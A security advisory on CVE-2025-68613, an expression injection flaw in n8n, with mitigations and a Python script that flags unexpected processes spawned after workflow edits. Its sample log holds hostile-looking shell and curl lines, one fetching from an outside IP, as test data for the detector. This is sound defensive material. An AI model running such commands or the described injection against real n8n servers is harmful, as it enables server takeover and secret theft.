Cybersecurity Threat Advisory: n8n vulnerability

The n8n workflow automation platform vulnerability, tracked as CVE‑2025‑68613, enables authenticated attackers to execute arbitrary code via expression injection in workflow definitions. Review this Cybersecurity Threat Advisory for actionable steps to mitigate your risk from this flaw.

What is the threat?

CVE‑2025‑68613 is an expression injection vulnerability in n8n: expressions embedded in workflow definitions are evaluated on the underlying server, so authenticated users with workflow creation or edit permissions can execute OS-level commands when the system evaluates those expressions. Technical reports give it a CVSS score of 9.9 and note widespread exposure among internet-accessible instances, underscoring severe risk for vulnerable deployments.

Why is it noteworthy?

Upon successful exploitation, a single malicious workflow expression can lead to full server compromise when evaluated. Exploitation only needs an authenticated user with workflow creation or edit rights—no elevated privileges—greatly expanding the attacker pool in exposed environments.

What is the exposure or risk?

The exposure from CVE‑2025‑68613 centers on server-side arbitrary code execution. A crafted workflow expression, once evaluated, lets attackers run OS-level commands under the n8n process—enabling full instance takeover, access to workflow data and stored integration secrets/tokens, workflow manipulation for persistence and covert exfiltration, and lateral movement into connected systems.

What are the recommendations?

Barracuda recommends the following actions to mitigate any potential risk to your n8n instance(s):

  • Apply the released patch to all n8n instances to address CVE‑2025‑68613.
  • Restrict public access to the n8n UI/API by placing it behind a VPN or allow-lists. Enforce SSO/MFA and limit roles that can create or edit workflows to reduce expression injection risk.
  • Preserve server logs and workflow history, and audit for newly created or modified workflows with unusual expressions. Check for unexpected processes spawned by the n8n service and rotate tokens/secrets stored in n8n and connected integrations if compromise is suspected.
  • Instrument SIEM to alert on workflow creation/edit events, anomalous expression patterns, sudden credential or integration changes, and host-level signals such as unexpected child processes or outbound connections from the n8n service account.
  • Enumerate all n8n deployments, verify versions against the patched release, and document internet exposure (ingress rules, reverse proxies, and access policies) to prioritize patching and monitoring for publicly reachable instances.
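The monitoring recommendations above (alert on workflow create/edit events and on unexpected child processes from the n8n service account) can be combined into one correlated detection. The script below is an added example written for this advisory; it is not Barracuda's or n8n's code. It assumes a constructed log format with an n8n audit line per workflow create/edit and a host process-execution line per spawned process; the field names, the ten-minute correlation window, the allow-list of expected child programs, and the sample events themselves are all assumptions for the example. It generalizes the bullet points slightly by raising severity when an unexpected process follows a recent workflow edit, which is the pattern a triage analyst would want surfaced first.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log lines (not real n8n or host logs). Two record types:
#   "<ts> n8n audit ..."  an n8n workflow create/edit audit event
#   "<ts> host exec ..."  a process spawned on the host, with the account it runs as
SAMPLE_LOG = """\
2025-12-01T10:00:05Z n8n audit event=workflow.updated user=alice workflow=wf-1021 name="Invoice sync"
2025-12-01T10:00:09Z host exec user=n8n parent=node cmd="/usr/bin/node /app/n8n/main.js"
2025-12-01T10:02:40Z n8n audit event=workflow.created user=bob workflow=wf-1099 name="Report export"
2025-12-01T10:03:01Z host exec user=n8n parent=node cmd="/bin/sh -c id"
2025-12-01T10:03:02Z host exec user=n8n parent=sh cmd="/usr/bin/curl http://203.0.113.7/x"
2025-12-01T11:30:00Z host exec user=n8n parent=node cmd="/usr/bin/git --version"
"""

AUDIT_RE = re.compile(r"^(?P<ts>\S+) n8n audit (?P<kv>.*)$")
EXEC_RE = re.compile(r"^(?P<ts>\S+) host exec (?P<kv>.*)$")
# key=value pairs, where the value may be a double-quoted string with spaces
KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')

WORKFLOW_CHANGE_EVENTS = {"workflow.created", "workflow.updated"}


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def parse_kv(s):
    """Turn 'a=1 b="two words"' into {'a': '1', 'b': 'two words'}."""
    out = {}
    for m in KV_RE.finditer(s):
        out[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(2)
    return out


def program_name(cmd):
    """Basename of the executable in a command line: '/bin/sh -c id' -> 'sh'."""
    return cmd.split()[0].rsplit("/", 1)[-1]


def detect(log_text, window=timedelta(minutes=10),
           service_account="n8n", allowed_programs=frozenset({"node"})):
    """Flag processes spawned under the n8n service account that are not on the
    allow-list, and link each one to the most recent workflow create/edit
    inside the correlation window (severity 'high' if linked, else 'medium')."""
    recent_edits = []  # (timestamp, audit event) in log order
    alerts = []
    for line in log_text.splitlines():
        m = AUDIT_RE.match(line)
        if m:
            ev = parse_kv(m.group("kv"))
            if ev.get("event") in WORKFLOW_CHANGE_EVENTS:
                recent_edits.append((parse_ts(m.group("ts")), ev))
            continue
        m = EXEC_RE.match(line)
        if not m:
            continue
        ev = parse_kv(m.group("kv"))
        if ev.get("user") != service_account:
            continue
        prog = program_name(ev["cmd"])
        if prog in allowed_programs:
            continue  # expected for a healthy n8n process, e.g. the node runtime itself
        ts = parse_ts(m.group("ts"))
        linked = None
        for edit_ts, edit in reversed(recent_edits):  # newest edit first
            if 0 <= (ts - edit_ts).total_seconds() <= window.total_seconds():
                linked = edit
                break
        alerts.append({
            "time": m.group("ts"),
            "program": prog,
            "cmd": ev["cmd"],
            "severity": "high" if linked else "medium",
            "workflow": linked["workflow"] if linked else None,
            "editor": linked["user"] if linked else None,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

On the sample input the two processes that follow Bob's new workflow within the window come out as high-severity alerts tied to `wf-1099`, while the later `git` invocation is reported on its own at medium severity because no workflow change precedes it closely enough. The same structure maps onto a SIEM correlation rule: the audit stream supplies the "who changed which workflow" context, and the host stream supplies the "what did the service account spawn" signal.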

References

For more in-depth information about the recommendations, please visit the following links:

If you have any questions about this Cybersecurity Threat Advisory, don’t hesitate to get in touch with Barracuda Managed XDR’s Security Operations Center.

This post originally appeared on Smarter MSP.